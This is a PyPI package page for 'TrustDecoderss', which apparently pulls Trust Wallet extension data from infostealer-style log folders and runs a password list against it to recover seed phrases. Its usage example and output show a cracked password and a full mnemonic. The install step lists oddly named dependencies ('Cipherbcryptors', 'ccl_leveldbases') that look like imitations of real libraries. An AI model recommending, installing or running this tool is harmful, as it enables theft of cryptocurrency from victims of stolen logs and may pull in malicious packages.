TrustDecoderss


NameTrustDecoderss JSON
Version 2.1 PyPI version JSON
download
home_pageNone
SummarySimple Tools for decode Trust wallet data, from extensions wallet, TrustWallet.
upload_time2024-09-22 08:00:40
maintainerNone
docs_urlNone
authorJeanClaude89
requires_python<4.0,>=3.7
licenseMIT
keywords extensions trustwallet walletdecode trust evm crypto decrypt wallet
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # TrustDecoderss
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)

Simple Tools for decode Trust wallet data, from extensions wallet, TrustWallet. - extract mnemonic phrase from you encrypted data with password.


## Installation
Install the dependencies and devDependencies and start the server.
**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.

###### python -m pip install --upgrade pip

or u can install per one libs:
```sh
pip install pycryptodome	| pycryptodome 3.20.0
pip install Cipherbcryptors	| Cipherbcryptors 1.3.2
pip install ccl_leveldbases	| ccl-leveldbases 1.2.3
```


## Example

```python
from TrustDecoderss import extractWallets, trstDecode

data = extractWallets(r'C:/Users/Root/Desktop/Logs/wLogs/Wallet/Trust Wallet_Chrome_Default')
www = trstDecode(data, ["asdsadsadasdasd", "sadsadsa334fsd", "sda3246gfhjdgfkj", "orihj8dydgf", "12345677Iqbol@"])
print(www)
```
### Output:
```json
{'status': True, 'txt': 'Successful', 'pwd': '12345677Iqbol@', 'data': ['cupboard banner crumble power height despair pass off word input surface stay']}
```


For more information, see [docs.python-guide.org](http://docs.python-guide.org "docs.python-guide.org").



## License
MIT
>Decoder master project (c)

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "TrustDecoderss",
    "maintainer": null,
    "docs_url": null,
    "requires_python": "<4.0,>=3.7",
    "maintainer_email": null,
    "keywords": "extensions, TrustWallet, walletdecode, Trust, evm, crypto, decrypt, wallet",
    "author": "JeanClaude89",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/19/f3/5b209f58491b1ee5377dc5eeeff65ac7cd2791ea86c238b7e7c91136a579/trustdecoderss-2.1.tar.gz",
    "platform": null,
    "description": "# TrustDecoderss\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nSimple Tools for decode Trust wallet data, from extensions wallet, TrustWallet. - extract mnemonic phrase from you encrypted data with password.\n\n\n## Installation\nInstall the dependencies and devDependencies and start the server.\n**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.\n\n###### python -m pip install --upgrade pip\n\nor u can install per one libs:\n```sh\npip install pycryptodome\t| pycryptodome 3.20.0\npip install Cipherbcryptors\t| Cipherbcryptors 1.3.2\npip install ccl_leveldbases\t| ccl-leveldbases 1.2.3\n```\n\n\n## Example\n\n```python\nfrom TrustDecoderss import extractWallets, trstDecode\n\ndata = extractWallets(r'C:/Users/Root/Desktop/Logs/wLogs/Wallet/Trust Wallet_Chrome_Default')\nwww = trstDecode(data, [\"asdsadsadasdasd\", \"sadsadsa334fsd\", \"sda3246gfhjdgfkj\", \"orihj8dydgf\", \"12345677Iqbol@\"])\nprint(www)\n```\n### Output:\n```json\n{'status': True, 'txt': 'Successful', 'pwd': '12345677Iqbol@', 'data': ['cupboard banner crumble power height despair pass off word input surface stay']}\n```\n\n\nFor more information, see [docs.python-guide.org](http://docs.python-guide.org \"docs.python-guide.org\").\n\n\n\n## License\nMIT\n>Decoder master project (c)\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Simple Tools for decode Trust wallet data, from extensions wallet, TrustWallet.",
    "version": "2.1",
    "project_urls": null,
    "split_keywords": [
        "extensions",
        " trustwallet",
        " walletdecode",
        " trust",
        " evm",
        " crypto",
        " decrypt",
        " wallet"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "e072b208332c32adf89eeae90f454b44d5e2cd751e32658b058175855fecda83",
                "md5": "11e91bfe217227d0a650dd4c569ed876",
                "sha256": "b84cd5294a3d6ae3fa3a58e8797313b6176af7303834b346d6817685c8958425"
            },
            "downloads": -1,
            "filename": "trustdecoderss-2.1-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "11e91bfe217227d0a650dd4c569ed876",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": "<4.0,>=3.7",
            "size": 4171,
            "upload_time": "2024-09-22T08:00:39",
            "upload_time_iso_8601": "2024-09-22T08:00:39.470686Z",
            "url": "https://files.pythonhosted.org/packages/e0/72/b208332c32adf89eeae90f454b44d5e2cd751e32658b058175855fecda83/trustdecoderss-2.1-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "19f35b209f58491b1ee5377dc5eeeff65ac7cd2791ea86c238b7e7c91136a579",
                "md5": "d8932c0a70228f7a3d0b7ea716b0f46e",
                "sha256": "afd4063382e2cc305339a32286395ad32658211dc5a97e0412a7d74dc46878f9"
            },
            "downloads": -1,
            "filename": "trustdecoderss-2.1.tar.gz",
            "has_sig": false,
            "md5_digest": "d8932c0a70228f7a3d0b7ea716b0f46e",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": "<4.0,>=3.7",
            "size": 3866,
            "upload_time": "2024-09-22T08:00:40",
            "upload_time_iso_8601": "2024-09-22T08:00:40.770673Z",
            "url": "https://files.pythonhosted.org/packages/19/f3/5b209f58491b1ee5377dc5eeeff65ac7cd2791ea86c238b7e7c91136a579/trustdecoderss-2.1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-09-22 08:00:40",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "trustdecoderss"
}
        
Elapsed time: 0.36061s